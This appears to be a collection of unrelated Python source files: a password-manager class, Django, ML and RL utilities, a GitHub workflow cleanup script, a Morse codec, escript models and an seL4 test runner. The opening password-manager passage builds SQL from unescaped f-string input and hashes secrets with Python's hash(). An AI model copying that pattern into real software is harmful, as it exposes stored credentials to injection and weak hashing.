hashFromDatabase = self.cur.fetchall()[0][0]
if hashFromDatabase == hash(primaryPassword):
# Login successful.
self._privateKey = hashEnc(primaryPassword)
self.loginStatus = True # True means successful login.
else:
self.loginStatus = False
self._privateKey = None
def changePrimaryPassword(self, oldPassword: str, newPassword: str) -> bool:
self.cur.execute("SELECT password FROM PrimaryPassword;")
hashFromDatabase = self.cur.fetchall()[0][0]
if hashFromDatabase == hash(oldPassword):
# Can change password.
self.cur.execute(f"UPDATE PrimaryPassword SET password = '{hash(newPassword)}' WHERE password = '{hash(oldPassword)}';")
self.conn.commit()
entries = self.seeEntries()
newKey = hashEnc(newPassword)
for entry in entries:
self.cur.execute(f"UPDATE Passwords SET password = '{encrypt(self.getEntry(entry[0], entry[1]), newKey)}' WHERE (email = '{entry[0]}' AND website = '{entry[1]}');")
self.conn.commit()
self._privateKey = newKey
return True
else:
return False
def getEntry(self, email: str, website: str) -> str:
try:
self.cur.execute(f"SELECT password FROM Passwords WHERE (email = '{email}' AND website = '{website}');")
encryptedData = self.cur.fetchall()[0]
return decrypt(encryptedData[0], self._privateKey)
except Exception:
return ""
def putEntry(self, email: str, website: str, password: str) -> bool:
try:
self.cur.execute(f"INSERT INTO Passwords (email, website, password) VALUES ('{email}', '{website}', '{encrypt(password, self._privateKey)}');")
return True
except Exception as e:
return False
def updateEntry(self, oldEmail: str, oldWebsite: str, email: str, website: str, password: str) -> None:
self.cur.execute(f"UPDATE Passwords SET email = '{email}', website = '{website}', password = '{encrypt(password, self._privateKey)}' WHERE (email = '{oldEmail}' AND website = '{oldWebsite}');")
self.conn.commit()
def seeEntries(self):
self.cur.execute("SELECT email, website FROM Passwords;")
return self.cur.fetchall()
# To return in format of (email, website) tuple.
|
import torchvision.models as models
import torch
model = models.resnet50(pretrained=True)
model.eval()
batch = torch.randn((1, 3, 224, 224))
traced_model = torch.jit.trace(model, batch)
torch.jit.save(traced_model, 'resnet50.pt')
|
from django.contrib import admin
from django.urls import path, include
from django.conf.urls import url
from .views import api_root
app_name = 'core'
urlpatterns = [
url('api-root/',api_root,name='api_root'),
]
|
#!/usr/bin/env python
""" Collection of numerically evaluated optical parameters
"""
def edlen(P,T,k,f):
""" Index of refraction of air, using the Edlen formula
Input parameters:
P - air pressure in Pa
T - the temperature in C
k - the vacuum wave number kL/(2*Pi) in um^-1
f - partial pressure of water vapor in the air, in Pa (can be
calculated from the relative humidity using the Goff-Gratch equation.
"""
return 1 + ((8342.54 + 2406147 / (130 - k ** 2) + 15998 / (38.9 - k **2)) * \
(P / 96095.43) * ((1 + 1e-8 * (0.601 - 0.00972 * T) * P) / (1 + 0.0036610 * T)) - \
f * (0.037345 - 0.000401 * k ** 2)) * 1e-8
|
# Copyright © 2019 Arm Ltd. All rights reserved.
# SPDX-License-Identifier: MIT
import numpy as np
from .._generated.pyarmnn import Tensor as annTensor, TensorInfo, DataType_QuantisedAsymm8, \
DataType_Float32, DataType_QuantisedSymm16, DataType_Signed32, DataType_Float16
class Tensor(annTensor):
"""pyArmnn Tensor object
This class overrides the swig generated Tensor class. The aim of
this is to create an easy to use public api for the Tensor object.
Memory is allocated and managed by this class, avoiding the need to manage
a separate memory area for the tensor compared to the swig generated api.
"""
def __init__(self, *args):
""" Create Tensor object.
Supported tensor data types:
DataType_QuantisedAsymm8,
DataType_QuantisedSymm16,
DataType_Signed32,
DataType_Float32,
DataType_Float16
Examples:
Create an empty tensor
>>> import pyarmnn as ann
>>> ann.Tensor()
Create tensor given tensor information
>>> ann.Tensor(ann.TensorInfo(...))
Create tensor from another tensor i.e. copy a tensor
>>> ann.Tensor(ann.Tensor())
Args:
tensor(Tensor, optional): Create Tensor from a Tensor i.e. copy.
tensor_info (TensorInfo, optional): Tensor information.
Raises:
TypeError: unsupported input data type.
ValueError: appropriate constructor could not be found with provided arguments.
"""
self.__memory_area = None
# TensorInfo as first argument, we need to create memory area manually
if len(args) > 0 and isinstance(args[0], TensorInfo):
self.__create_memory_area(args[0].GetDataType(), args[0].GetNumElements())
super().__init__(args[0], self.__memory_area.data)
# copy constructor - reference to memory area is passed from copied tensor
# and armnn's copy constructor is called
elif len(args) > 0 and isinstance(args[0], Tensor):
self.__memory_area = args[0].get_memory_area()
super().__init__(args[0])
# empty constructor
elif len(args) == 0:
super().__init__()
else:
raise ValueError('Incorrect number of arguments or type of arguments provided to create Tensor.')
def __copy__(self) -> 'Tensor':
""" Make copy of a tensor.
Make tensor copyable using the python copy operation.
Note:
The tensor memory area is NOT copied. Instead, the new tensor maintains a
reference to the same memory area as the old tensor.
Example:
Copy empty tensor
>>> from copy import copy
>>> import pyarmnn as ann
>>> tensor = ann.Tensor()
>>> copied_tensor = copy(tensor)
Returns:
Tensor: a copy of the tensor object provided.
"""
return Tensor(self)
def __create_memory_area(self, data_type: int, num_elements: int):
""" Create the memory area used by the tensor to output its results.
Args:
data_type (int): The type of data that will be stored in the memory area.
See DataType_*.
num_elements (int): Determines the size of the memory area that will be created.
"""
np_data_type_mapping = {DataType_QuantisedAsymm8: np.uint8,
DataType_Float32: np.float32,
DataType_QuantisedSymm16: np.int16,
DataType_Signed32: np.int32,
DataType_Float16: np.float16}
if data_type not in np_data_type_mapping:
raise ValueError("The data type provided for this Tensor is not supported.")
self.__memory_area = np.empty(shape=(num_elements,), dtype=np_data_type_mapping[data_type])
def get_memory_area(self) -> np.ndarray:
""" Get values that are stored by the tensor.
Returns:
ndarray : Tensor data (as numpy array).
"""
return self.__memory_area
|
"""Utility functions for RL training."""
import torch
import numpy as np
def discount(rewards, gamma):
"""
Discount the reward trajectory.
Parameters
----------
rewards : list of float
Reward trajectory.
gamma : float
Discount factor.
Returns
-------
discounted_rewards : list of float
Discounted reward trajectory.
"""
R = 0.0
discounted_rewards = []
for r in reversed(rewards):
R = r + gamma * R
discounted_rewards.insert(0, R)
discounted_rewards = torch.tensor(discounted_rewards, device=rewards.device)
return discounted_rewards
def construct_state(world, robot, device="cpu"):
"""
Construct state as a tensor given world and robot.
State is the concatenation of:
- XY coordinates of the goal (2 dim)
- XY coordinates of the tip position (2 dim)
- Pose information of other objects (7 * n_obj dim)
- Joint angles (7 dim)
Parameters
----------
world : env.Environment object
Environment instance.
robot : torobo_wrapper.Torobo object
Torobo instance.
device : string or torch.device
Device of state tensor.
Returns
-------
state : torch.tensor
State tensor.
"""
tip_x = np.array(robot.get_tip_pos()[:2])
joint_angles = robot.get_joint_angles()
object_x = world.get_state().reshape(-1, 7)
object_x[:, :2] = object_x[:, :2] - tip_x
x = np.concatenate([object_x[0, :2], tip_x, joint_angles, object_x[1:].reshape(-1)])
x = torch.tensor(x, dtype=torch.float, device=device)
return x
def clip_to_rectangle(x, global_limits):
"""
Clip x to global limits.
Parameters
----------
x : list of float
Array to be clipped.
global_limits : list of list of float
Global operational limits. [[min_x, max_x], [min_y, max_y]].
Returns
-------
clipped : list of float
Clipped state.
"""
clipped = x.copy()
clipped[0] = np.clip(clipped[0], global_limits[0][0], global_limits[0][1])
clipped[1] = np.clip(clipped[1], global_limits[1][0], global_limits[1][1])
return clipped
def in_rectangle(x, rectangle):
"""
Check whether x is in rectangle.
Parameters
----------
x : list of float
2-dimensional point. [x, y]
rectangle : list of list of float
Rectangle limits. [[min_x, max_x], [min_y, max_y]]
Returns
-------
result : bool
True if point is in rectangle limits else False.
"""
p = np.array(x)
rec = np.array(rectangle)
result = False
if (rec[:, 0] < p).all() and (p < (rec[:, 1])).all():
result = True
return result
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from .mnist_classifier import MNISTClassifier
__all__ = ('MNISTClassifier')
|
import argparse
import github
import requests
from classroom_tools import github_utils
parser = argparse.ArgumentParser()
parser.add_argument(
'--token',
required=True,
help='GitHub personal access token with repo permissions'
)
parser.add_argument(
'--repo_fullname',
required=True,
help='Repository fullname'
)
parser.add_argument(
'--workflow_name_filter',
help='Delete workflow runs with names that contain this filter'
)
parser.add_argument(
'--delete_only_failed_runs',
default=False,
action='store_true',
help='Delete only workflow runs that failed'
)
def delete_workflow_run(workflow_run_url, token):
print(f'Deleting: {workflow_run_url}')
res = requests.delete(url=workflow_run_url,
headers={'Authorization': f'token {token}'})
print('Success' if res.ok else 'Failed')
def main(args):
print('\n\n' + 'Deleting workflow runs'.center(80, '='))
args = parser.parse_args(args)
print('Args:\n' + ''.join(f'\t{k}: {v}\n' for k, v in vars(args).items()))
github_utils.verify_token(args.token)
g = github.Github(login_or_token=args.token)
repo = g.get_repo(full_name_or_id=args.repo_fullname)
workflow_dict = {}
for run in repo.get_workflow_runs():
workflow_name = repo.get_workflow(id_or_name=str(run.raw_data['workflow_id'])).name
workflow_dict.setdefault(workflow_name, [])
workflow_dict[workflow_name].append(run)
for workflow_name, runs in workflow_dict.items():
if len(runs) > 1:
if args.delete_only_failed_runs:
failed_runs = list(
filter(
lambda run: run.conclusion == 'failure' and run.status == 'completed',
runs
),
)
for run in failed_runs:
if args.workflow_name_filter is not None:
if args.workflow_name_filter in workflow_name:
delete_workflow_run(run.url, args.token)
else:
runs.sort(key=lambda run: run.created_at, reverse=True)
for run in runs[1:]:
if args.workflow_name_filter is not None:
if args.workflow_name_filter in workflow_name:
delete_workflow_run(run.url, args.token)
else:
delete_workflow_run(run.url, args.token)
if __name__ == '__main__':
import sys
main(sys.argv[1:])
|
"""A Morse code encoder and decoder.
Morse code consists of "dits", "dahs" and spaces. A dit or dah is a signal,
whereas a space is an absensce of signal. A dit is one unit of Morse time (or
beat) a dah is three. Each dit or dah is followed by a space of one dit. Each
character is followed by a space of three dits, and words are separated by a
space of seven dits.
"""
from enigma.keyer import Keyer
MORSE_CODE = {
"A": ".-",
"B": "-...",
"C": "-.-.",
"D": "-..",
"E": ".",
"F": "..-.",
"G": "--.",
"H": "....",
"I": "..",
"J": ".---",
"K": "-.-",
"L": ".-..",
"M": "--",
"N": "-.",
"O": "---",
"P": ".--.",
"Q": "--.-",
"R": ".-.",
"S": "...",
"T": "-",
"U": "..-",
"V": "...-",
"W": ".--",
"X": "-..-",
"Y": "-.--",
"Z": "--..",
"1": ".----",
"2": "..---",
"3": "...--",
"4": "....-",
"5": ".....",
"6": "-....",
"7": "--...",
"8": "---..",
"9": "----.",
"0": "-----",
}
# Define space (in "dits") at end of characters and words
MORSE_CHAR_SPACE = " " * 3
MORSE_WORD_SPACE = " " * 7
class Morse:
"""Morse code encoder/decoder."""
def __init__(self):
"""Initialise empty text and Morse attributes."""
self.text = ""
self.morse = ""
def encode(self, text):
"""Encode the input text to Morse.
:param text: text to convert to Morse
:type text: str
"""
self.text = text.upper()
self.morse = ""
print(f"Text: {self.text}")
# Convert each character to Morse, then add end-of-character space
for char in self.text:
self.morse += MORSE_CODE[char] + MORSE_CHAR_SPACE
print(f"Morse: {self.morse}")
def decode(self, morse):
"""Decode input Morse to text.
:param morse: input Morse code
:type morse: str
"""
self.morse = morse
self.text = ""
print(f"Morse: {self.morse}")
# Play Morse code sound
keyer = Keyer(self.morse)
keyer.play()
# Break up Morse words
morse_words = self.morse.split(MORSE_WORD_SPACE)
self.decode_words(morse_words)
print(f"Text: {self.text}")
def decode_words(self, morse_words):
"""Decode a list of Morse words.
:param morse_words: list of Morse words
:type morse_words: list
"""
# Split each word into letters and decode them
for morse_word in morse_words:
morse_letters = morse_word.split(MORSE_CHAR_SPACE)
self.decode_letters(morse_letters)
# Add space after word
self.text += " "
def decode_letters(self, morse_letters):
"""Decode a list of Morse letters.
:param morse_letters: list of Morse letters
:type morse_letters: list
"""
for morse_letter in morse_letters:
# Look up each Morse letter to find text letter
for key, value in MORSE_CODE.items():
if value == morse_letter:
# Found matching Morse; add corresponding text letter
self.text += key
break
|
##############################################################################
#
# Copyright (c) 2003-2020 by The University of Queensland
# http://www.uq.edu.au
#
# Primary Business: Queensland, Australia
# Licensed under the Apache License, version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
#
# Development until 2012 by Earth Systems Science Computational Center (ESSCC)
# Development 2012-2013 by School of Earth Sciences
# Development from 2014 by Centre for Geoscience Computing (GeoComp)
# Development from 2019 by School of Earth and Environmental Sciences
#
##############################################################################
from __future__ import division, print_function
__copyright__="""Copyright (c) 2003-2020 by The University of Queensland
http://www.uq.edu.au
Primary Business: Queensland, Australia"""
__license__="""Licensed under the Apache License, version 2.0
http://www.apache.org/licenses/LICENSE-2.0"""
__url__="https://launchpad.net/escript-finley"
from esys.escript import length, wherePositive, whereNegative, exp, inf, sup
from esys.escript.modelframe import Model,ParameterSet
from esys.escript.linearPDEs import LinearPDE
from math import log
import numpy
class Sequencer(Model):
"""
Runs through time until t_end is reached.
:ivar t_end: model is terminated when t_end is passed, default 1 (in).
:type t_end: ``float``
:ivar dt_max: maximum time step size, default `Model.UNDEF_DT` (in)
:type dt_max: ``float``
:ivar t: current time stamp (in/out). By default it is initialized with zero.
:type t: ``float``
"""
def __init__(self,**kwargs):
"""
"""
super(Sequencer,self).__init__(**kwargs)
self.declareParameter(t=0.,
t_end=1.,
dt_max=Model.UNDEF_DT)
def doInitialization(self):
"""
initialize time integration
"""
self.__t_old = self.t
def doStepPreprocessing(self, dt):
self.t = self.__t_old+dt
def doStepPostprocessing(self, dt):
self.__t_old = self.t
def finalize(self):
"""
returns true when `t` has reached `t_end`
"""
return self.t >= self.t_end
def getSafeTimeStepSize(self, dt):
"""
returns `dt_max`
"""
return self.dt_max
class GaussianProfile(ParameterSet):
"""
Generates a Gaussian profile at center x_c, width width and height A
over a domain
:note: Instance variable domain - domain
:note: Instance variable x_c - center of the Gaussian profile (default [0.,0.,0.])
:note: Instance variable A - (in) height of the profile. A maybe a vector. (default 1.)
:note: Instance variable width - (in) width of the profile (default 0.1)
:note: Instance variable r - (in) radius of the circle (default = 0)
In the case that the spatial dimension is two, The third component of
x_c is dropped.
"""
def __init__(self,**kwargs):
super(GaussianProfile, self).__init__(**kwargs)
self.declareParameter(domain=None,
x_c=numpy.zeros([3]),
A=1.,
width=0.1,
r=0)
def out(self):
"""
Generate the Gaussian profile
Link against this method to get the output of this model.
"""
x = self.domain.getX()
dim = self.domain.getDim()
l = length(x-self.x_c[:dim])
m = whereNegative(l-self.r)
return (m+(1.-m)*exp(-log(2.)*(l/self.width)**2))*self.A
class InterpolateOverBox(ParameterSet):
"""
Returns values at each time. The values are defined through given values
at time node. For two dimensional domains back values are ignored.
:note: Instance variable domain - domain
:note: Instance variable value_left_bottom_front - (in) value at left,bottom,front corner
:note: Instance variable value_right_bottom_front - (in) value at right, bottom, front corner
:note: Instance variable value_left_top_front - (in) value at left,top,front corner
:note: Instance variable value_right_top_front - (in) value at right,top,front corner
:note: Instance variable value_left_bottom_back - (in) value at left,bottom,back corner
:note: Instance variable value_right_bottom_back - (in) value at right,bottom,back corner
:note: Instance variable value_left_top_back - (in) value at left,top,back corner
:note: Instance variable value_right_top_back - (in) value at right,top,back corner
"""
def __init__(self, **kwargs):
super(InterpolateOverBox, self).__init__(self)
self.declareParameter(domain=None,
value_left_bottom_front=0.,
value_right_bottom_front=0.,
value_left_top_front=0.,
value_right_top_front=0.,
value_left_bottom_back=0.,
value_right_bottom_back=0.,
value_left_top_back=0.,
value_right_top_back=0.)
def out(self):
"""
values at domain locations by bilinear interpolation of the given values.
Link against this method to get the output of this model.
"""
x = self.domain.getX()
if self.domain.getDim() == 2:
x0,x1=x[0],x[1]
left_bottom_front0,right_top_back0=inf(x0),sup(x0)
left_bottom_front1,right_top_back1=inf(x1),sup(x1)
f_right = (x0 - left_bottom_front0)/(right_top_back0 -left_bottom_front0)
f_left = 1. - f_right
f_top = (x1 - left_bottom_front1)/(right_top_back1 - left_bottom_front1)
f_bottom = 1. - f_top
out = f_left * f_bottom * self.value_left_bottom_front \
+ f_right * f_bottom * self.value_right_bottom_front \
+ f_left * f_top * self.value_left_top_front \
+ f_right * f_top * self.value_right_top_front
else:
x0,x1,x2=x[0],x[1],x[2]
left_bottom_front0,right_top_back0=inf(x0),sup(x0)
left_bottom_front1,right_top_back1=inf(x1),sup(x1)
left_bottom_front2,right_top_back2=inf(x2),sup(x2)
f_right = (x0 - left_bottom_front0)/(right_top_back0 - left_bottom_front0)
f_left = 1. - f_right
f_top = (x1 - left_bottom_front1)/(right_top_back1 - left_bottom_front1)
f_bottom = 1. - f_top
f_back = (x2 - left_bottom_front1)/(right_top_back2 - left_bottom_front2)
f_front = 1. - f_back
out = f_left * f_bottom * f_front * self.value_left_bottom_front\
+ f_right * f_bottom * f_front * self.value_right_bottom_front\
+ f_left * f_top * f_front * self.value_left_top_front\
+ f_right * f_top * f_front * self.value_right_top_front\
+ f_left * f_bottom * f_back * self.value_left_bottom_back\
+ f_right * f_bottom * f_back * self.value_right_bottom_back\
+ f_left * f_top * f_back * self.value_left_top_back\
+ f_right * f_top * f_back * self.value_right_top_back
return out
class InterpolatedTimeProfile(ParameterSet):
"""
Returns values at each time. The values are defined through given
values at time node.
value[i] defines the value at time nodes[i]. Between nodes linear
interpolation is used.
For time t<nodes[0], value[0] is used and for t>nodes[l], values[l]
is used where l=len(nodes)-1.
:note: Instance variable t - (in) current time
:note: Instance variable node - (in) list of time nodes
:note: Instance variable values - (in) list of values at time nodes
"""
def __init__(self,**kwargs):
super( InterpolatedTimeProfile, self).__init__(**kwargs)
self.declareParameter(t=0., \
nodes=[0.,1.],\
values=[1.,1.])
def out(self):
"""
current value
Link against this method to get the output of this model.
"""
l = len(self.nodes) - 1
t = self.t
if t <= self.nodes[0]:
return self.values[0]
else:
for i in range(1,l):
if t < self.nodes[i]:
m = (self.values[i-1] - self.values[i])/\
(self.nodes[i-1] - self.nodes[i])
return m*(t-self.nodes[i-1]) + self.values[i-1]
return self.values[l]
class ScalarDistributionFromTags(ParameterSet):
"""
creates a scalar distribution on a domain from tags, If tag_map is given
the tags can be given a names and tag_map is used to map it into domain tags.
:ivar domain: domain
:type domain: `esys.escript.Domain`
:ivar default: default value
:ivar tag0: tag 0
:type tag0: ``int``
:ivar value0: value for tag 0
:type value0: ``float``
:ivar tag1: tag 1
:type tag1: ``int``
:ivar value1: value for tag 1
:type value1: ``float``
:ivar tag2: tag 2
:type tag2: ``int``
:ivar value2: value for tag 2
:type value2: ``float``
:ivar tag3: tag 3
:type tag3: ``int``
:ivar value3: value for tag 3
:type value3: ``float``
:ivar tag4: tag 4
:type tag4: ``int``
:ivar value4: value for tag 4
:type value4: ``float``
:ivar tag5: tag 5
:type tag5: ``int``
:ivar value5: value for tag 5
:type value5: ``float``
:ivar tag6: tag 6
:type tag6: ``int``
:ivar value6: value for tag 6
:type value6: ``float``
:ivar tag7: tag 7
:type tag7: ``int``
:ivar value7: value for tag 7
:type value7: ``float``
:ivar tag8: tag 8
:type tag8: ``int``
:ivar value8: value for tag 8
:type value8: ``float``
:ivar tag9: tag 9
:type tag9: ``int``
:ivar value9: value for tag 9
:type value9: ``float``
"""
def __init__(self,**kwargs):
super(ScalarDistributionFromTags, self).__init__(**kwargs)
self.declareParameter(domain=None,
default=0.,
tag0=None,
value0=0.,
tag1=None,
value1=0.,
tag2=None,
value2=0.,
tag3=None,
value3=0.,
tag4=None,
value4=0.,
tag5=None,
value5=0.,
tag6=None,
value6=0.,
tag7=None,
value7=0.,
tag8=None,
value8=0.,
tag9=None,
value9=0.)
def out(self):
"""
returns a `esys.escript.Data` object
Link against this method to get the output of this model.
"""
d=Scalar(self.default,Function(self.domain))
if not self.tag0 is None: d.setTaggedValue(self.tag0,self.value0)
if not self.tag1 is None: d.setTaggedValue(self.tag1,self.value1)
if not self.tag2 is None: d.setTaggedValue(self.tag2,self.value2)
if not self.tag3 is None: d.setTaggedValue(self.tag3,self.value3)
if not self.tag4 is None: d.setTaggedValue(self.tag4,self.value4)
if not self.tag5 is None: d.setTaggedValue(self.tag5,self.value5)
if not self.tag6 is None: d.setTaggedValue(self.tag6,self.value6)
if not self.tag7 is None: d.setTaggedValue(self.tag7,self.value7)
if not self.tag8 is None: d.setTaggedValue(self.tag8,self.value8)
if not self.tag9 is None: d.setTaggedValue(self.tag9,self.value9)
return d
class SmoothScalarDistributionFromTags(ParameterSet):
"""
creates a smooth scalar distribution on a domain from region tags
:ivar domain: domain
:type domain: `esys.escript.Domain`
:ivar default: default value
:ivar tag0: tag 0
:type tag0: ``int``
:ivar value0: value for tag 0
:type value0: ``float``
:ivar tag1: tag 1
:type tag1: ``int``
:ivar value1: value for tag 1
:type value1: ``float``
:ivar tag2: tag 2
:type tag2: ``int``
:ivar value2: value for tag 2
:type value2: ``float``
:ivar tag3: tag 3
:type tag3: ``int``
:ivar value3: value for tag 3
:type value3: ``float``
:ivar tag4: tag 4
:type tag4: ``int``
:ivar value4: value for tag 4
:type value4: ``float``
:ivar tag5: tag 5
:type tag5: ``int``
:ivar value5: value for tag 5
:type value5: ``float``
:ivar tag6: tag 6
:type tag6: ``int``
:ivar value6: value for tag 6
:type value6: ``float``
:ivar tag7: tag 7
:type tag7: ``int``
:ivar value7: value for tag 7
:type value7: ``float``
:ivar tag8: tag 8
:type tag8: ``int``
:ivar value8: value for tag 8
:type value8: ``float``
:ivar tag9: tag 9
:type tag9: ``int``
:ivar value9: value for tag 9
:type value9: ``float``
"""
def __init__(self,**kwargs):
super(SmoothScalarDistributionFromTags, self).__init__(**kwargs)
self.declareParameter(domain=None,
default=0.,
tag0=None,
value0=0.,
tag1=None,
value1=0.,
tag2=None,
value2=0.,
tag3=None,
value3=0.,
tag4=None,
value4=0.,
tag5=None,
value5=0.,
tag6=None,
value6=0.,
tag7=None,
value7=0.,
tag8=None,
value8=0.,
tag9=None,
value9=0.)
def __update(self,tag,tag_value,value):
if self.__pde==None:
self.__pde=LinearPDE(self.domain,numSolutions=1)
mask=Scalar(0.,Function(self.domain))
mask.setTaggedValue(tag,1.)
self.__pde.setValue(Y=mask)
mask=wherePositive(abs(self.__pde.getRightHandSide()))
value*=(1.-mask)
value+=tag_value*mask
return value
def out(self):
"""
returns a `esys.escript.Data` object
Link against this method to get the output of this model.
"""
d=Scalar(self.default,Solution(self.domain))
self.__pde=None
if not self.tag0 is None: d=self.__update(self.tag0,self.value0,d)
if not self.tag1 is None: d=self.__update(self.tag1,self.value1,d)
if not self.tag2 is None: d=self.__update(self.tag2,self.value2,d)
if not self.tag3 is None: d=self.__update(self.tag3,self.value3,d)
if not self.tag4 is None: d=self.__update(self.tag4,self.value4,d)
if not self.tag5 is None: d=self.__update(self.tag5,self.value5,d)
if not self.tag6 is None: d=self.__update(self.tag6,self.value6,d)
if not self.tag7 is None: d=self.__update(self.tag7,self.value7,d)
if not self.tag8 is None: d=self.__update(self.tag8,self.value8,d)
if not self.tag9 is None: d=self.__update(self.tag9,self.value9,d)
return d
class LinearCombination(ParameterSet):
"""
Returns a linear combination of the f0*v0+f1*v1+f2*v2+f3*v3+f4*v4
:ivar f0: numerical object or None, default=None (in)
:ivar v0: numerical object or None, default=None (in)
:ivar f1: numerical object or None, default=None (in)
:ivar v1: numerical object or None, default=None (in)
:ivar f2: numerical object or None, default=None (in)
:ivar v2: numerical object or None, default=None (in)
:ivar f3: numerical object or None, default=None (in)
:ivar v3: numerical object or None, default=None (in)
:ivar f4: numerical object or None, default=None (in)
:ivar v4: numerical object or None, default=None (in)
"""
def __init__(self,**kwargs):
super(LinearCombination, self).__init__(**kwargs)
self.declareParameter(f0=None, \
v0=None, \
f1=None, \
v1=None, \
f2=None, \
v2=None, \
f3=None, \
v3=None, \
f4=None, \
v4=None)
def out(self):
"""
returns f0*v0+f1*v1+f2*v2+f3*v3+f4*v4.
Link against this method to get the output of this model.
"""
if not self.f0 is None and not self.v0 is None:
fv0 = self.f0*self.v0
else:
fv0 = None
if not self.f1 is None and not self.v1 is None:
fv1 = self.f1*self.v1
else:
fv1 = None
if not self.f2 is None and not self.v2 is None:
fv2 = f2*v2
else:
fv2 = None
if not self.f3 is None and not self.v3 is None:
fv3 = self.f3*self.v3
else:
fv3 = None
if not self.f4 is None and not self.v4 is None:
fv4 = self.f4*self.v4
else:
fv4 = None
if fv0 is None:
out = 0.
else:
out = fv0
if not fv1 is None:
out += fv1
if not fv2 is None:
out += fv2
if not fv3 is None:
out += fv3
return out
class MergeConstraints(ParameterSet):
"""
Returns a linear combination of the f0*v0+f1*v1+f2*v2+f3*v3+f4*v4
"""
def __init__(self,**kwargs):
super(MergeConstraints, self).__init__(**kwargs)
self.declareParameter(location_of_constraint0=None, \
value_of_constraint0=None, \
location_of_constraint1=None, \
value_of_constraint1=None, \
location_of_constraint2=None, \
value_of_constraint2=None, \
location_of_constraint3=None, \
value_of_constraint3=None, \
location_of_constraint4=None, \
value_of_constraint4=None)
def location_of_constraint(self):
"""
return the values used to constrain a solution
:return: the mask marking the locations of the constraints
:rtype: `escript.Scalar`
"""
out_loc=0
if not self.location_of_constraint0 is None:
out_loc=wherePositive(out_loc+wherePositive(self.location_of_constraint0))
if not self.location_of_constraint1 is None:
out_loc=wherePositive(out_loc+wherePositive(self.location_of_constraint1))
if not self.location_of_constraint2 is None:
out_loc=wherePositive(out_loc+wherePositive(self.location_of_constraint2))
if not self.location_of_constraint3 is None:
out_loc=wherePositive(out_loc+wherePositive(self.location_of_constraint3))
return out_loc
def value_of_constraint(self):
"""
return the values used to constrain a solution
:return: values to be used at the locations of the constraints. If
``value`` is not given ``None`` is rerturned.
:rtype: `escript.Scalar`
"""
out_loc=0
out=0
if not self.location_of_constraint0 is None:
tmp=wherePositive(self.location_of_constraint0)
out=out*(1.-tmp)+self.value_of_constraint0*tmp
out_loc=wherePositive(out_loc+tmp)
if not self.location_of_constraint1 is None:
tmp=wherePositive(self.location_of_constraint1)
out=out*(1.-tmp)+self.value_of_constraint1*tmp
out_loc=wherePositive(out_loc+tmp)
if not self.location_of_constraint2 is None:
tmp=wherePositive(self.location_of_constraint2)
out=out*(1.-tmp)+self.value_of_constraint2*tmp
out_loc=wherePositive(out_loc+tmp)
if not self.location_of_constraint3 is None:
tmp=wherePositive(self.location_of_constraint3)
out=out*(1.-tmp)+self.value_of_constraint3*tmp
out_loc=wherePositive(out_loc+tmp)
return out
# vim: expandtab shiftwidth=4:
|
"""Context parser that returns a dict-like from a toml file."""
import logging
import pypyr.toml as toml
logger = logging.getLogger(__name__)
def get_parsed_context(args):
"""Parse input as path to a toml file, returns dict of toml contents."""
logger.debug("starting")
if not args:
logger.debug("pipeline invoked without context arg set. For this toml "
"parser you're looking for something like: $ pypyr "
"pipelinename ./myfile.toml")
return None
path = ' '.join(args)
logger.debug("attempting to open file: %s", path)
payload = toml.read_file(path)
# no special check whether top-level is mapping necessary, by spec toml
# can only have mapping (key-value pairs or table) at top level.
logger.debug("toml file parsed. Count: %d", len(payload))
logger.debug("done")
return payload
|
# Generated by Django 3.0.4 on 2020-03-16 02:40
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('OfficeApp', '0005_auto_20200315_1919'),
]
operations = [
migrations.AlterField(
model_name='episode',
name='air_date',
field=models.DateField(default=None),
),
]
|
#!/usr/bin/env python
#
# Copyright 2017, Data61
# Commonwealth Scientific and Industrial Research Organisation (CSIRO)
# ABN 41 687 119 230.
#
# This software may be distributed and modified according to the terms of
# the BSD 2-Clause license. Note that NO WARRANTY is provided.
# See "LICENSE_BSD2.txt" for details.
#
# @TAG(DATA61_BSD)
#
# Builds and runs all tutorial solutions, comparing output with expected
# completion text.
import sys, os, argparse, re, pexpect, subprocess, tempfile, logging
import run
import signal
import psutil
import os.path
import xml.sax.saxutils
import manage
import common
# this assumes this script is in a directory inside the tutorial directory
TUTORIAL_DIR = common.get_tutorial_dir()
TOP_LEVEL_DIR = common.get_project_root()
# timeout per test in seconds
DEFAULT_TIMEOUT = 1800
# number of make jobs to run in parallel
DEFAULT_JOBS = 1
# Completion text for each test
COMPLETION = {
# seL4 tests
"pc99_sel4_hello-1": "hello world",
"pc99_sel4_hello-2": "(thread_2: hallo wereld)|(main: hello world)",
"pc99_sel4_hello-3": "main: got a reply: 0xffff9e9e",
"pc99_sel4_hello-4": "process_2: got a reply: 0xffff9e9e",
"pc99_sel4_hello-2-nolibs": "(thread_2: hallo wereld)|(main: hello world)",
"pc99_sel4_hello-3-nolibs": "main: got a reply: 0xffff9e9e",
"pc99_sel4_hello-timer": "timer client wakes up: got the current timer tick:",
"zynq7000_sel4_hello-1": "hello world",
"zynq7000_sel4_hello-2": "(thread_2: hallo wereld)|(main: hello world)",
"zynq7000_sel4_hello-3": "main: got a reply: 0xffff9e9e",
"zynq7000_sel4_hello-4": "process_2: got a reply: 0xffff9e9e",
"zynq7000_sel4_hello-2-nolibs": "(thread_2: hallo wereld)|(main: hello world)",
"zynq7000_sel4_hello-3-nolibs": "main: got a reply: 0xffff9e9e",
"zynq7000_sel4_hello-timer": "timer client wakes up: got the current timer tick:",
# camkes tests
"zynq7000_camkes_hello-camkes-0": "Hello CAmkES World",
"zynq7000_camkes_hello-camkes-1": "Component echo saying: hello world",
"zynq7000_camkes_hello-camkes-2": "FAULT HANDLER: data fault from client.control",
"zynq7000_camkes_hello-camkes-timer": "After the client: wakeup",
"pc99_camkes_hello-camkes-0": "Hello CAmkES World",
"pc99_camkes_hello-camkes-1": "Component echo saying: hello world",
"pc99_camkes_hello-camkes-2": "FAULT HANDLER: data fault from client.control"
}
# List of strings whose appearence in test output indicates test failure
FAILURE_TEXTS = [
pexpect.EOF,
pexpect.TIMEOUT,
"Ignoring call to sys_exit_group"
]
ARCHITECTURES = ['arm', 'ia32']
PLATFORMS = ['pc99', 'zynq7000']
def print_pexpect_failure(failure):
if failure == pexpect.EOF:
print("EOF received before completion text")
elif failure == pexpect.TIMEOUT:
print("Test timed out")
def app_names(plat, system):
"""
Yields the names of all tutorial applications for a given architecture
for a given system
"""
build_config_dir = os.path.join(TUTORIAL_DIR, 'build-config')
